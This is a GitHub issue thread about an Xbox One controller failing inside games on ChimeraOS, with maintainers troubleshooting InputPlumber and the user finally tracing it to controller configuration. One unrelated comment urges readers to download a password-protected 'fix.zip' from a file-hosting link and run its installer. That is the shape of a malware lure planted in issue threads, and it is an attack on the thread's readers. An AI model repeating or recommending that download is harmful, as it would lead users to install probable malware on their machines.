### ISSUE TITLE
Xbox one controller working in Steam menu but not in game

### ISSUE THREAD

**Issue by CorentinWicht** [ChimeraOS/chimeraos#1017]
Dear ChimeraOS users,

I have just installed ChimeraOS (latest stable release) and I am very happy with it.
I am currently using my old Xbox One controller (plugged through USB because it has no built-in bluetooth) and it works wonders to navigate in the Steam menus.

Nevertheless, as soon as I launch any games, the controller does not work anymore and the only thing I can do is to press the Xbox button to come back to the Home menu.

I have tried to both activate and deactivate Steam input when launching the games but it had no effect unfortunately...

Any idea why this is happening?

Best,

C.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alkazar** [comment]
What games specifically are not working?

**Comment by NeroReflex** [comment]
> What games specifically are not working? Are you certain the games you tried have gamepad support?

I am sure one of such games is AC Valhalla because this happened to me too

**Comment by pastaq** [comment]
Does this happen with InputPlumber disabled?

**Comment by CorentinWicht** [comment]
My bad I realized that this only happens with games that have "not yet been tested by Valve for their compatibility with the Steam Deck device" such as:

- [Euro Truck Simulator 2 Demo](https://store.steampowered.com/app/231120)
- [Half Sword Demo](https://store.steampowered.com/app/2642680)

While this one seems to work:
- [Yu-Gi-Oh! Master Duel](https://store.steampowered.com/app/1449850)

@pastaq where can I disable `InputPlumber` and what would it do?

**Comment by pastaq** [comment]
In a terminal 
`sudo systemctl stop inputplumber`

If that fixes it
 `sudo systemctl disable inputplumber `

**Comment by CorentinWicht** [comment]
> In a terminal `sudo systemctl stop inputplumber`
> 
> If that fixes it `sudo systemctl disable inputplumber `

Thanks for the suggestion, this had no effect other than removing the Steam Menu access...
Nevermind, I believe this was only related to a misunderstanding of how to configure controller settings, especially for games which are quite new.

Best,

C.
